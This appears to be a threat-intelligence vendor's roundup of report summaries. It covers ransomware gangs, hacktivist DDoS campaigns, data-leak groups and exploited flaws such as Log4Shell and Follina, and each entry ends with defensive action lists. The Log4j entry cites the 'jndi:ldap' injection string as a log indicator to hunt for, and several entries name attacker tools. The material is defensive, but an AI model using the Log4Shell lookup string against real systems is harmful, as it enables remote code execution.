Vulnerabilities in Q4 2022: The Flaws and Fervor of Exploitation

In Q4 2022, cyber criminals actively targeted over 6,200 newly disclosed vulnerabilities (CVEs), with memory corruption and privilege escalation leading the pack. Remote code execution, denial of service, heap overflow, and information disclosure followed closely. Threat actors often chain lower-severity vulnerabilities to achieve access and escalate privileges, highlighting the importance of a risk-based vulnerability management approach.

Highly discussed flaws included ProxyNotShell (CVE-2022-41040, CVE-2022-41082) and Fortinet FortiOS vulnerabilities (CVE-2022-40684, CVE-2022-42475), with proof-of-concept exploits widely shared on criminal forums. Attackers also exploited years-old vulnerabilities in exposed infrastructure, showing that unpatched legacy systems remain a major risk.

Key Takeaways: Threat actors rapidly exploit newly disclosed CVEs, share PoC exploits, and actively target both new and old vulnerabilities. Privilege escalation and memory corruption vulnerabilities remain highly sought after due to their potential impact.

Immediate Actions:

• Prioritize patching of critical and actively exploited vulnerabilities
• Monitor threat actor chatter and PoC sharing in underground forums
• Assess and secure exposed infrastructure and legacy systems
• Implement risk-based vulnerability management rather than relying solely on CVSS scores
• Leverage threat intelligence for actionable insights on emerging vulnerabilities

Read Full Report Here

What We're Reading This Month: July 2022

This month, our reading roundup highlights major developments in cybersecurity and threat intelligence . Key topics include dark web research, data leakage, and emerging trends in DevSecOps. Digital Shadows’ Photon Research Team reports on recent campaigns targeting organizations’ digital assets, emphasizing the growing risks of brand impersonation, credential theft, and sensitive data exposure.

Notable insights:

• Organizations are facing increasing threats from cybercriminals leveraging dark web forums to trade stolen data.
• Data leakage incidents continue to rise, highlighting the need for proactive monitoring and rapid response.
• DevSecOps practices are critical for integrating security into software development lifecycles, reducing vulnerabilities before deployment.
• Brand protection remains essential as threat actors increasingly target reputational assets alongside technical exploits.
• Awareness of emerging malware, ransomware, and phishing campaigns helps organizations anticipate and mitigate risks.

Immediate Actions:

• Regularly monitor dark web sources for exposure of company credentials or sensitive information.
• Ensure all development and production environments follow DevSecOps best practices.
• Update incident response plans to address both technical and reputational threats.
• Educate employees on recognizing phishing attempts and suspicious activity targeting corporate assets.
• Conduct routine audits of digital assets to identify potential exposure points and misconfigurations.

Read Full Report Here

Ransomware in Q2 2022: Back in Business

The second quarter of 2022 saw a resurgence of ransomware activity, reversing the slowdown from Q1. Notable events included the shutdown of the Conti ransomware gang, the rise of new groups, and LockBit’s release of its upgraded LockBit 3.0 variant, introducing bug-bounty programs and new payment options via Zcash.

Key Takeaways:

• Conti’s Closure: Conti ceased operations following internal chat leaks, though some members likely dispersed into new ransomware groups. LockBit overtook Conti in total victims.
• LockBit Activity: LockBit accounted for nearly a third of all ransomware incidents in Q2, breaking records with 231 victims in a single quarter. The release of LockBit 3.0 could drive further activity in Q3 and beyond.
• Emerging Groups: New ransomware collectives like Black Basta, Mindware, Cheers, RansomHouse, Industrial Spy, Yanluowang, Onyx, NOKOYAWA, and DarkAngels appeared, while other groups shut down their data-leak sites.
• Sector Targets: Industrial Goods & Services led in attacks (18.4%), followed by Technology (8.7%), Construction & Materials (7.9%), Healthcare (6.4%), and Government (5.5%). Critical sectors faced the most significant increases.
• Geographic Focus: The United States remained the top target (38.9%), with Germany, the UK, Italy, Canada, and France also seeing increased ransomware activity.

Immediate Actions:

• Monitor ransomware groups’ data-leak sites and emerging malware variants.
• Implement sector-specific protections, especially for critical infrastructure like industrial, technology, and healthcare sectors.
• Update incident response plans and ensure preparedness for double-extortion and data auction tactics.
• Educate employees and stakeholders on phishing and ransomware threats.
• Track ransomware trends with intelligence tools like SearchLight or GreyMatter to anticipate attacks and mitigate exposure.

Read Full Report Here

Killnet: The Hactivist Group That Started A Global Cyber War

Since the Russia-Ukraine conflict began, hacktivist activity has surged, with groups recruiting large numbers of participants to launch attacks. Killnet , a pro-Russia collective, has transformed from a DDoS tool provider into an organized cyber threat, targeting NATO members and Ukraine-supporting countries. Their operations focus on government agencies and critical industries, using Layer 3/4 and Layer 7 DDoS attacks to disrupt services. Killnet leverages Telegram to coordinate attacks, recruit volunteers, and share target lists, amplifying the scale of its campaigns.

Why it matters: Killnet’s coordinated cyber assaults pose operational and financial risks for organizations in targeted countries, potentially crippling essential services and critical infrastructure.

Immediate Actions:

• Implement and regularly update anti-DDoS protections
• Monitor public channels for threat announcements and target lists
• Block known malicious IPs associated with Killnet
• Review incident response plans for prolonged service disruptions
• Educate staff on recognizing early indicators of DDoS activity

Read Full Report Here

Attackers seize Microsoft zero-day for malware dissemination, espionage

A critical Microsoft zero-day vulnerability, known as Follina (CVE-2022-30190), is being actively exploited by both nation-state and cybercriminal groups. The flaw allows remote code execution when users open or preview Office documents, without enabling macros. Threat actors, including PRC-aligned groups and QakBot affiliates, have leveraged Follina for phishing campaigns targeting government and enterprise systems in multiple countries. Despite a patch released in June 2022, unpatched systems remain vulnerable, making this a high-risk attack vector for malware, trojans, and potential ransomware deployment.

Why it matters: Follina enables attackers to compromise systems with minimal user interaction, posing significant operational, financial, and data-security risks for organizations worldwide.

Immediate Actions:

• Apply Microsoft’s June 2022 patch immediately or implement the MSDT URL protocol workaround
• Scan for and block malicious attachments in emails
• Train staff to identify suspicious emails and phishing attempts
• Monitor for indicators of compromise linked to Follina exploitation
• Review endpoint security configurations to mitigate remote code execution risks

Read Full Report Here

Killnet hacktivists declare cyber war on 10 countries

The pro-Russia hacktivist group Killnet has declared “war” on ten countries—including the US, UK, Germany, Italy, and Ukraine—threatening widespread DDoS attacks. Originating as a purchasable DDoS tool, Killnet has evolved into a politically motivated hacktivist group, recruiting volunteers and targeting critical infrastructure such as government, financial, and transportation sectors. The group’s activities have included attacks on websites in Poland, Germany, Italy, Romania, and Ukraine, with campaigns announced and coordinated through Telegram. Killnet’s attacks are largely unsophisticated, focusing on service disruption rather than data theft or destruction, but pose a credible risk to organizations reliant on online operations.

Why it matters: Killnet’s growing membership and high visibility in Russian social channels suggest an increase in disruptive DDoS activity, which could impact critical services and economies in targeted countries.

Immediate Actions:

• Ensure DDoS mitigation solutions are active and up-to-date for critical systems
• Monitor networks for unusual traffic spikes indicating potential attacks
• Educate staff about social engineering attempts and threat actor propaganda
• Coordinate with national CERTs and relevant authorities for situational awareness
• Review incident response plans to handle potential service outages

Read Full Report Here

ALPHV: The First Rust-Based Ransomware

The ransomware group ALPHV (aka BlackCat) has emerged as the first RUST-based ransomware, operating as a ransomware-as-a-service (RaaS) platform. ALPHV uses a double-extortion model, encrypting victims’ systems while threatening to publish stolen data on its leak site. Since late 2021, the group has posted nearly 100 victims and remains highly active. Its affiliate program recruits skilled actors, offering tiered payouts from 80% to 90% depending on ransom amounts, while prohibiting attacks in CIS countries, China, Taiwan, Hong Kong, and Turkey.

Why it matters: ALPHV’s Rust-based ransomware enhances performance and evasion, differentiating it from other malware. Affiliates gain access through compromised credentials or exploited vulnerabilities, often using tools like PowerShell, Cobalt Strike, and Windows admin tools. The group conducts careful reconnaissance, exfiltrates sensitive data, and customizes ransom notes for each victim.

Immediate Actions:

• Monitor for signs of ALPHV activity, including unusual PowerShell execution or admin tool usage
• Audit and secure Active Directory accounts to prevent privilege escalation
• Apply strong endpoint and network defenses, including threat-hunting for Cobalt Strike activity
• Educate staff on phishing and credential-compromise risks
• Maintain up-to-date backups and validate incident response plans for ransomware events

Read Full Report Here

Karakurt Hacking Team moonlights as Conti side business

The Karakurt Hacking Team has been linked to the notorious Conti ransomware gang, likely operating as a “side business” to handle data extortion when Conti’s encryption fails. Security researchers discovered connections between Conti infrastructure and Karakurt servers, revealing that Conti sometimes uploads stolen data to Karakurt’s leak site. Karakurt does not encrypt data but exfiltrates and exposes it, and has re-extorted victims that previously paid Conti. The relationship suggests that organizations hit by Conti remain at risk of follow-on attacks from Karakurt.

Why it matters: Karakurt specializes in data exfiltration and single-extortion, complementing Conti’s double-extortion model. The group uses tools such as Ligolo-ng, Metasploit, Impacket, and Danted to gain initial access, move laterally, and maintain persistence. Conti, Ryuk, and Karakurt together form a ransomware ecosystem covering encryption, exfiltration, and secondary extortion, making attacks more comprehensive and harder to mitigate.

Immediate Actions:

• Patch systems and maintain updated anti-virus software
• Implement multi-factor authentication on all corporate accounts
• Disable external RDP access and ensure proper network segmentation
• Monitor network activity for unusual lateral movement or reverse tunnels
• Validate incident response and backup strategies to handle ransomware and data extortion events

Read Full Report Here

Q1 2022 Ransomware Roundup

In Q1 2022, ransomware activity remained significant but declined compared to Q4 2021, with 582 organizations named on ransomware data-leak sites—a 25.3% decrease. LockBit 2.0 and Conti were the most active gangs, responsible for 57.8% of all incidents. The Industrial Goods & Services sector was the most targeted (20.1%), followed by Financial Services, Construction & Materials, Technology, and Government. Geographically, the United States remained the primary target (38.5%), with the UK, Germany, Italy, and France following.

Key Trends: The Russia-Ukraine war influenced ransomware groups’ allegiances, with Conti and STORMOUS supporting Russia, while LockBit 2.0 remained apolitical. New extortion-style groups such as Lapsus$ emerged, claiming ransomware attacks without evidence of encryption, highlighting the rise of extortion-only tactics. A shift in targeting toward mid-sized organizations was observed, as these groups diversify their attacks to avoid law enforcement scrutiny.

Immediate Actions:

• Continue monitoring ransomware activity and emerging groups
• Ensure robust patching and anti-virus measures
• Implement multi-factor authentication across all accounts
• Restrict and monitor RDP access and network segmentation
• Validate backups and incident response plans for ransomware and extortion scenarios

Read Full Report Here

Maverick extortionist group Lapsus$ goes after big tech

The Lapsus$ cyber-extortion group has recently targeted major technology companies, including Microsoft, Nvidia, Samsung, LGE, and Okta, stealing source code, proprietary data, and cryptocurrency. Unlike typical ransomware actors, Lapsus$ openly publishes stolen data on Telegram and engages followers in deciding future targets. The group uses social engineering, insider recruitment, and account compromise rather than malware to gain access. Its high-profile attacks and bold tactics make these campaigns particularly relevant for organizations relying on intellectual property and cloud services.

Why it matters: Breaches of source code and sensitive data can expose security vulnerabilities, result in financial loss, and damage reputations, while enabling further targeted attacks on customers and partners.

Immediate Actions:

• Review and strengthen multi-factor authentication, avoiding SMS or voice-based MFA
• Monitor employee account activity for suspicious logins and password resets
• Audit Okta and other identity management logs for anomalies
• Educate staff on social engineering and help-desk verification protocols
• Limit access to sensitive source code and critical systems

Read Full Report Here

Cybercriminals React to Ukraine-Russia Conflict

Following Russia’s invasion of Ukraine, cybercriminal groups have been actively positioning themselves around the conflict. Notably, the Conti ransomware group and CoomingProject pledged support for Russia in case of cyber retaliation, highlighting their potential to target critical infrastructure and exfiltrate sensitive data. Cybercriminal forums, both English- and Russian-language, have been abuzz with discussions on DDoS attacks, data theft, and predictions about the conflict, reflecting a mix of opportunism, political opinion, and strategic planning. These developments signal increased risk for organizations in conflict-adjacent regions and those reliant on global digital infrastructure.

Why it matters: Geopolitical conflicts can catalyze cybercrime activity, increasing exposure to ransomware, data leaks, and infrastructure disruption for businesses worldwide.

Immediate Actions:

• Review and reinforce defenses for critical infrastructure and key services
• Monitor for unusual network activity and threat intelligence reports linked to conflict zones
• Strengthen multi-factor authentication and incident response protocols
• Educate staff on phishing and social engineering campaigns exploiting geopolitical events
• Coordinate with external partners and vendors on cyber risk awareness

Read Full Report Here

FBI warns public about fake QR codes scamming scanners

The FBI has issued a warning regarding a surge in malicious QR code scams, following reports of cybercriminals overlaying legitimate QR codes with fraudulent ones at parking stations across the US. Scanning these codes can redirect users to phishing sites, download malware, or compromise payment information. Such attacks exploit the public’s trust in QR codes and the growing use of contactless payments, making them particularly effective. While primarily executed by unsophisticated actors due to the need for physical placement, digital QR code scams may also rise. Users are advised to verify codes before scanning, ensure websites are legitimate, and maintain anti-malware protections.

Why it matters: QR code scams can compromise payments, credentials, and device security, increasing risk for everyday transactions and mobile-device users.

Immediate Actions:

• Verify QR codes before scanning, especially in public locations
• Use anti-malware software on all mobile devices
• Monitor accounts for unusual activity after using QR codes
• Educate staff and the public on the risks of QR code scams
• Report suspicious QR codes to relevant authorities

Read Full Report Here

Ransomware Q4 Overview

Q4 2021 saw continued ransomware growth, with 781 victims named on data-leakage sites—a 36.8% increase from the previous quarter. LockBit 2.0 remained the most active group, while Conti, PYSA, and AvosLocker also increased activity. Ransomware groups exploited new vulnerabilities, including Log4Shell (CVE-2021-44228) and Confluence (CVE-2021-26084), emphasizing the need for rapid patching. The RAMP forum became a hub for ransomware collaboration, and single-extortion attacks by groups like FIN12 minimized attack time. Key targeted sectors included Industrial Goods & Services, Construction & Materials, and Technology, with the US, UK, and Germany most affected. Insider threats and professionalization of ransomware operations are expected to continue into 2022.

Why it matters: Ransomware continues to evolve rapidly, exploiting new vulnerabilities and collaborating via forums, posing a significant threat across sectors and geographies.

Immediate Actions:

• Maintain timely patching and vulnerability management
• Monitor data-leak sites for potential exposure
• Educate employees on insider threat risks and ransomware tactics
• Implement advanced endpoint detection and response (EDR) solutions
• Conduct regular backups and test recovery procedures

Read Full Report Here

The Log4j Zero-Day: What We Know So Far

On 10 December 2021, a critical zero-day vulnerability, CVE-2021-44228 (“Log4Shell”), was discovered in the widely used Log4j Java library. This flaw allows unauthenticated remote code execution (RCE), affecting systems using Apache Struts, Solr, Druid, and other Log4j-dependent applications, including popular services like Minecraft. Threat actors began scanning and exploiting vulnerable systems immediately after proof-of-concept code became public.

Why it matters: The vulnerability is easy to exploit and has a broad attack surface, potentially compromising sensitive data and critical systems across industries.

Immediate Actions:

• Upgrade to Log4j version 2.15 or later; if not possible, set log4j2.formatMsgNoLookups to true or remove the JndiLookup class
• Assess logs for indicators of compromise (e.g., jndi:ldap )
• Identify application fields parsed by Log4j that could be manipulated by attackers
• Engage key suppliers to confirm exposure and remediation plans
• Capture lessons learned to improve incident response and logging processes
• Leverage threat intelligence feeds, forums, and vulnerability data for monitoring

Read Full Report Here

Call it a comeback: Cybercriminals delight in return of Emotet

Emotet has resurfaced after a major law enforcement takedown earlier in 2021, signaling a renewed threat to organizations worldwide. The malware is being distributed through malicious Microsoft Office and ZIP files, leveraging the TrickBot botnet to rebuild its infrastructure. Historically used as an initial access broker for ransomware groups such as Conti and Ryuk, Emotet enables attackers to establish backdoors and sell access to compromised networks. Early activity shows updated encryption and HTTPS communications, indicating operational improvements and preparation for broader campaigns.

Why it matters: Emotet has long served as a gateway for large-scale ransomware attacks, and its return increases the risk of phishing-driven compromises that can quickly escalate into enterprise-wide incidents.

Immediate Actions:

• Block malicious email attachments and enforce advanced spam filtering
• Disable or restrict Microsoft Office macros across the enterprise
• Enable multi-factor authentication for remote and privileged access
• Monitor for suspicious outbound HTTPS traffic and command-and-control patterns
• Conduct phishing awareness training and streamline reporting processes

Read Full Report Here

Ransomware Q3 Roll Up

Ransomware activity remained one of the most disruptive cyber threats in Q3 2021, highlighted by REvil’s supply-chain attack on Kaseya, which reportedly impacted up to one million downstream users. The quarter also saw the rise of LockBit 2.0 as the most active group, surpassing Conti, alongside continued double-extortion tactics and expansion of data-leak sites. Despite law enforcement pressure and forum bans, ransomware groups rebranded, resurfaced, and launched new platforms like RAMP to sustain operations. North America—particularly the United States—remained the primary target, with industrial goods, technology, and construction sectors heavily affected.

Why it matters: Ransomware groups are adapting through rebranding, supply-chain targeting, and faster attack timelines, increasing the likelihood of large-scale business disruption and third-party risk exposure.

Immediate Actions:

• Assess and monitor third-party and MSP access to critical systems
• Implement network segmentation to limit lateral movement
• Harden backup strategies and regularly test restoration procedures
• Monitor for data exfiltration and dark web exposure indicators
• Review incident response plans for rapid containment scenarios

Read Full Report Here

Single extortion shines in rapid FIN12 ransomware attacks

The FIN12 threat group is drawing attention for deploying ransomware significantly faster than most competitors, often encrypting systems in under three days. Unlike many ransomware operators, FIN12 primarily uses single-extortion tactics, focusing on rapid encryption rather than data theft and leak sites. The group frequently deploys Ryuk and Conti ransomware, leveraging phishing and compromised remote access environments for initial entry. Healthcare organizations—especially in North America—remain a primary target, increasing the likelihood of ransom payments due to the operational and life-safety risks of system downtime.

Why it matters: FIN12’s speed and focus on sensitive sectors like healthcare reduce detection windows and increase the probability of business disruption before defenders can respond.

Immediate Actions:

• Harden and monitor remote access services such as VPN and Citrix
• Implement rapid detection for lateral movement and privilege escalation
• Deploy endpoint detection and response (EDR) across critical systems
• Segment healthcare and other mission-critical networks
• Test incident response plans for sub-72-hour ransomware scenarios

Read Full Report Here

Cybersecurity Awareness Month: Week 1 – Managing Your Digital Shadow

Cybersecurity Awareness Month highlights the importance of managing your “digital shadow”—the exposed personal data that accumulates through social media, online accounts, data breaches, and public records. This information can include email addresses, phone numbers, family details, and employment history, all of which can be leveraged by threat actors during reconnaissance. Attackers frequently use open-source intelligence and social engineering to exploit exposed credentials, impersonate employees, or bypass account recovery controls. As digital footprints expand over time, unmanaged exposure increases both personal and organizational risk.

Why it matters: Excessive digital exposure enables targeted phishing, credential stuffing, and account takeover attacks that can lead to corporate compromise.

Immediate Actions:

• Audit your online presence using basic OSINT searches
• Change passwords for accounts exposed in data breaches
• Enable multi-factor authentication on personal and work accounts
• Restrict social media privacy settings and limit public details
• Remove personal data from public people-search websites where possible

Read Full Report Here

The Eeveelution of ShinyHunters: From Data Leaks to Extortions

ShinyHunters , a financially motivated cybercriminal group first known for selling and leaking massive datasets, has resurfaced with a shift toward direct extortion. After previously dumping stolen records from companies across technology, education, and media, the group is now auctioning allegedly stolen data — including a claimed 70 million-record dataset tied to AT&T . This marks a strategic evolution from data sales and free leaks to ransomware-style monetization. The move signals a broader trend of data theft actors adopting high-pressure extortion tactics to increase profits.

Why it matters: Data leak groups are evolving into full-scale extortion actors, increasing financial, legal, and reputational risk for organizations — even when breach claims remain unverified.

Immediate Actions:

• Monitor dark web forums for brand and data exposure
• Validate and segment sensitive data repositories
• Strengthen detection of data exfiltration activity
• Prepare executive response plans for public breach claims
• Review legal and regulatory notification requirements

Read Full Report Here

The Facebook Data Leak Explained

In April 2021, data from 533 million Facebook users resurfaced on cybercriminal forums after initially being scraped in 2019. Threat actors abused Facebook’s contact importer feature to harvest phone numbers — including those set to private — alongside public profile data such as names, locations, and employment details. The dataset circulated for sale before being released widely for free, dramatically increasing accessibility to criminals. Although no passwords were exposed, the scale and global reach of the leak make it highly operational for fraud and social engineering.

Why it matters: Large-scale data aggregation enables targeted phishing, vishing, SIM-swapping, and impersonation attacks — particularly against executives and high-profile individuals.

Immediate Actions:

• Assess executive and employee exposure in known data leaks
• Increase monitoring for phishing and vishing campaigns
• Enforce MFA across corporate and personal accounts
• Educate staff on social engineering risks tied to exposed PII
• Review privacy settings and limit publicly accessible data

Read Full Report Here

Clickbait to Checkmate: SMS-Based Scam Targets Us Smartphones and Accesses Victim Locations

A large-scale SMS phishing campaign dubbed the “USPS texting scam” is targeting U.S. smartphone users with spoofed delivery notifications impersonating brands like USPS , Amazon , and FedEx . Victims who click the link are routed through a fingerprinting chain that collects device, IP, and location data before being redirected to personalized phishing pages requesting PII and payment card details. The infrastructure is short-lived, geo-targeted to U.S. IP addresses, and designed to evade analysis. Beyond credit card theft, the campaign may enable future spearphishing, push-notification abuse, or broader fraud operations.

Why it matters: Personalized, location-aware smishing increases success rates and creates reusable intelligence for follow-on fraud, impersonation, and disinformation campaigns.

Immediate Actions:

• Block and report unsolicited SMS links at the carrier level
• Educate users on smishing indicators and brand impersonation
• Implement mobile threat defense and DNS filtering
• Monitor for spoofed brand domains and phishing kits
• Enforce MFA to limit credential reuse risk

Read Full Report Here

Recent Arrests and High-Profile Convictions: What Does It Mean for the Cyber Threat Landscape?

Recent law enforcement actions — including the sentencing of a member of The Dark Overlord , 179 arrests tied to Europol’s Operation DisrupTor, and U.S. charges against members of APT41 — signal increased global pressure on cybercriminal and nation-state actors. Authorities disrupted major dark web marketplaces, seized illicit funds, and exposed operators previously considered untouchable. While these actions demonstrate growing investigative capability and international coordination, history shows criminal ecosystems quickly regenerate. Threat actors are likely to adapt, improve operational security, and continue financially motivated and state-sponsored campaigns.

Why it matters: Arrests and indictments raise the cost of cybercrime but rarely eliminate it — instead driving adversaries to evolve tactics, infrastructure, and anonymity measures.

Immediate Actions:

• Monitor shifts in threat actor TTPs following major takedowns
• Track emerging dark web marketplaces and successor platforms
• Assess exposure to ransomware and extortion groups
• Strengthen attribution-aware threat intelligence collection
• Prepare for adaptive adversary OPSEC improvements

Read Full Report Here

A New Decade of Cyber Threats: Looking Back at The Trending Cyber Topics of Q1 2020

Q1 2020 saw a surge in cyber threats linked to global events, including geopolitical tensions and the COVID-19 pandemic. Threat actors exploited the assassination of Soleimani with defacement campaigns and targeted campaigns by APT34 . Scammers leveraged social distancing fears, promoting fake PPE, cures, and malicious mobile apps. Dark web activity increased via marketplaces like Apollon and search tools like Kilos, highlighting growing opportunities for cybercrime.

Why it matters: These threats demonstrate how crisis-driven events amplify attack surfaces, targeting both individuals and organizations with high potential financial and reputational impact.

Immediate Actions:

• Monitor for phishing campaigns and malicious apps linked to trending events
• Harden web and email defenses against defacement and spoofing attacks
• Audit dark web exposure and marketplace mentions of your organization
• Educate staff and users on fake cures, PPE scams, and mobile app risks
• Enforce multi-factor authentication and timely patching of critical systems

Read Full Report Here

REvil ransomware gang vanishes without a trace

The ransomware gang REvil has abruptly disappeared from the internet following its high-profile Kaseya supply-chain attack, which impacted over one million systems. Known for pioneering double extortion tactics, REvil’s shutdown coincides with bans from Russian-speaking cybercriminal forums and may reflect law enforcement pressure or financial gain. Meanwhile, affiliates may migrate to groups like Prometheus, which continues to operate while distancing itself from REvil. Other emerging threats include HelloKitty ransomware targeting VMware ESXi and SonicWall devices, exploiting unpatched vulnerabilities to encrypt virtual machines and compromise technology infrastructure.

Why it matters: REvil’s exit and ongoing ransomware activity highlight the evolving ransomware landscape, showing that high-impact attacks draw intense scrutiny and increase risk of operational disruption and permanent data loss for victims.

Immediate Actions:

• Ensure backups are current and tested for critical systems
• Apply patches to VMware ESXi, SonicWall, and other vulnerable infrastructure
• Monitor for ransomware activity and double extortion attempts
• Educate staff on phishing and supply-chain attack tactics
• Review incident response plans and recovery procedures

Read Full Report Here

DarkSide clogs Colonial Pipeline in major ransomware attack

In May 2021, the ransomware group DarkSide disrupted Colonial Pipeline, forcing a shutdown of 5,500 miles of US fuel pipelines and triggering regional emergency declarations. The attack, likely conducted by a DarkSide affiliate, underscores how ransomware targeting critical infrastructure can have immediate societal impact. DarkSide operates as a RaaS (ransomware-as-a-service), vetting affiliates and providing customizable ransomware, while other groups like Ryuk and UNC2529 exploited cracked software and phishing campaigns against research institutes and global organizations. DDoS attacks also targeted over 200 Belgian government and education websites, highlighting the ongoing threat to essential services.

Why it matters: Attacks on critical infrastructure and high-profile targets demonstrate the severe operational, financial, and reputational risks posed by ransomware and coordinated cyber campaigns.

Immediate Actions:

• Ensure offline and tested backups for critical systems
• Patch vulnerable software and enforce endpoint protection
• Monitor for ransomware activity and suspicious affiliate access
• Train staff on phishing, social engineering, and malware risks
• Implement DDoS mitigation and network monitoring for critical services

Read Full Report Here

Microsoft Exchange Server flaws inspire 30,000-plus cyber attacks

In March 2021, four zero-day vulnerabilities in Microsoft Exchange Servers—collectively dubbed ProxyLogon and related flaws—were actively exploited by multiple APT groups, including HAFNIUM, Tick, LuckyMouse, Winnti Group, and others. Exploitation enabled attackers to deploy web-shells, steal data, install malware, and even provide initial access for ransomware like DearCry. Daily attacks spiked from 700 to 7,200 within a week, exacerbated by proof-of-concept (PoC) exploit code shared online. The incident illustrates how quickly zero-days can be weaponized and highlights the persistent risk to unpatched third-party software.

Why it matters: Organizations relying on Exchange Servers—spanning government, private sector, and Fortune 500 companies—faced immediate compromise risk. The attack underscores the dangers of supply-chain vulnerabilities, as threat actors exploited trusted third-party software to scale attacks efficiently.

Immediate Actions:

• Disconnect affected Exchange Servers from the Internet until fully patched.
• Apply Microsoft’s security updates and manual patches using administrator accounts.
• Conduct forensic analysis: memory, registry hives, web logs, and event logs.
• Ensure antivirus/EDR tools are updated and configured to detect Indicators of Compromise.
• Monitor for unusual account activity and exposed employee credentials.
• Review and secure third-party integrations to limit supply-chain exposure.

Other notable incidents during the same period included F5 BIG-IP device vulnerabilities, a Verkada security camera breach by hacktivists, and the launch of DarkSide 2.0 ransomware-as-a-service, emphasizing the broad spectrum of cyber risks to organizations.

Read Full Report Here

Decryptor release kicks “professional” DarkSide ransomware group into action

The sophisticated DarkSide ransomware group recently responded to the release of a free decryptor that could restore encrypted files without paying ransom. Operating under a ransomware-as-a-service model, DarkSide targets organizations globally, combining encryption with data exposure in double-extortion schemes. Despite the decryptor’s limited success, the group quickly patched vulnerabilities, issued compensation, and maintained a professional public presence. This incident highlights the evolving business-like strategies of ransomware operators and the persistent threat to all sectors.

Why it matters: Even with available decryptors, organizations remain at risk of data exposure and extortion, underlining the need for robust security and incident response measures.

Immediate Actions:

• Verify backups and ensure they are offline and recoverable
• Implement strict access controls and monitor privileged accounts
• Educate staff on phishing and social engineering tactics
• Regularly update and patch systems to reduce exploit opportunities
• Monitor for unauthorized data exfiltration and ransomware indicators

Read Full Report Here

Newly identified FIN11 debuts tenacious ransomware tactics

The financially motivated FIN11 group has emerged with advanced Clop ransomware, capable of encrypting and exfiltrating sensitive data. Active since at least 2016, FIN11 continually refines its tactics to maintain persistence and evade detection, often re-infecting organizations even after initial remediation. Technical analysis shows overlaps with the TA505 group, suggesting shared methodologies, though no formal link is confirmed. All sectors are at risk, highlighting the threat’s ongoing relevance.

Why it matters: FIN11’s persistence and sophisticated ransomware can lead to prolonged operational disruption, data loss, and potential regulatory consequences.

Immediate Actions:

• Ensure robust offline backups and verify recovery procedures
• Enhance network segmentation and limit lateral movement
• Deploy endpoint detection and continuous monitoring for ransomware activity
• Conduct phishing and social engineering awareness training
• Audit access logs for unusual or repeated intrusion attempts

Read Full Report Here

FIN7/Carbanak OpSec failure reveals group's tools, plans

A lapse in operational security by the notorious FIN7 group exposed their upcoming tools, campaigns, and underground affiliations. Researchers gained access to FIN7’s communication channels, revealing the development of a new loader, Tirion , intended to replace the legacy Carbanak backdoor. This exposure provides rare insight into the group’s evolving tactics and highlights the ongoing threat they pose to organizations globally.

Why it matters: FIN7 continues to innovate malware for financial gain, and understanding their operations helps organizations anticipate and defend against future attacks.

Immediate Actions:

• Monitor for Tirion and Carbanak-related indicators of compromise
• Strengthen email and network defenses against phishing campaigns
• Review and update endpoint security solutions
• Audit privileged accounts and limit unnecessary access
• Implement continuous monitoring for unusual network activity

Read Full Report Here

ShinyHunters “second stage” exposes 26 companies’ data in 2 week

The ShinyHunters threat group has returned with a second wave of data leaks, exposing over 408 million records from 26 companies across technology, media, travel, e-commerce, finance, and education. This follows their earlier 2020 campaign that compromised more than 300 million user records. The scale and diversity of affected organizations underscore the group’s persistence and the ongoing risk of large-scale data breaches.

Why it matters: Exposed records increase the risk of identity theft, phishing, and credential abuse, impacting both businesses and customers.

Immediate Actions:

• Notify affected users and reset compromised credentials
• Monitor for unusual account activity and potential fraud
• Implement multi-factor authentication across all systems
• Audit exposed systems for vulnerabilities and patch promptly
• Review and enhance data protection and encryption practices

Read Full Report Here

Attackers exploit Samsung and university domains in phishing campaign

A new phishing campaign has been uncovered targeting Samsung and University of Oxford domains, exploiting an Adobe Campaign redirection flaw. Attackers used compromised mail servers to deliver heavily obfuscated emails that redirected users to fraudulent Office 365 login pages, aiming to steal credentials. This campaign demonstrates the ongoing threat of sophisticated, targeted phishing attacks against high-profile organizations.

Why it matters: Credential theft from these campaigns can lead to unauthorized access, data breaches, and wider organizational compromise.

Immediate Actions:

• Educate users on recognizing phishing emails and suspicious links
• Monitor login attempts and enable multi-factor authentication
• Patch Adobe Campaign and related vulnerabilities promptly
• Audit email servers for unauthorized use or redirection
• Deploy email filtering to detect obfuscated phishing messages

Read Full Report Here

New threat group ShinyHunters exposes 18 companies

The ShinyHunters group has leaked databases from at least 18 companies, exposing over 266 million user records across education, media, e-commerce, and technology sectors. The group has circulated the data on dark web marketplaces and forums and hinted at a potential second wave of leaks. Their tactics resemble those of the earlier GnosticPlayers group, signaling continued large-scale data breach activity.

Why it matters: Exposed user records increase the risk of identity theft, phishing attacks, and account compromise for affected organizations and customers.

Immediate Actions:

• Notify impacted users and enforce credential resets
• Implement multi-factor authentication on all accounts
• Monitor for suspicious login attempts and fraud activity
• Audit systems for further vulnerabilities and patch promptly
• Strengthen data encryption and storage practices

Read Full Report Here

APT 37 re-emerges, exploits cloud for espionage

After a brief lull, the North Korean threat group APT37 has resumed cyber-espionage operations using spearphishing campaigns targeting individuals with lures about North Korean refugees. The March 2020 campaign leveraged cloud platforms to distribute malware via hyperlinks, bypassing traditional security tools and avoiding attachment detection. This marks APT37’s first activity since Microsoft seized 50 of their domains, highlighting the group’s persistence and intelligence-gathering focus.

Why it matters: APT37’s continued activity threatens sensitive data, particularly in government, research, and international relations contexts, despite prior domain seizures.

Immediate Actions:

• Educate users on phishing tactics and suspicious hyperlinks
• Implement URL filtering and cloud security monitoring
• Deploy endpoint detection for malware from non-attachment vectors
• Audit access to sensitive data and privileged accounts
• Monitor for anomalous activity and unusual network traffic

Read Full Report Here

Sophisticated TA505 spear phishing campaigns thrive and evolve

The financially motivated threat actor TA505 has continued spearphishing campaigns through late 2019 and early 2020, frequently deploying new or updated malware to evade detection. Targeting multiple sectors, TA505 relies on phishing as its primary access method, demonstrating that even well-known attack vectors remain highly effective. The group is expected to maintain persistent activity throughout 2020.

Why it matters: TA505’s campaigns highlight the ongoing risk of credential compromise, malware infection, and potential operational disruption via phishing.

Immediate Actions:

• Conduct phishing awareness training for all employees
• Enable multi-factor authentication on critical accounts
• Monitor email traffic and suspicious login attempts
• Deploy advanced malware detection and endpoint monitoring
• Regularly update software and patch known vulnerabilities

Read Full Report Here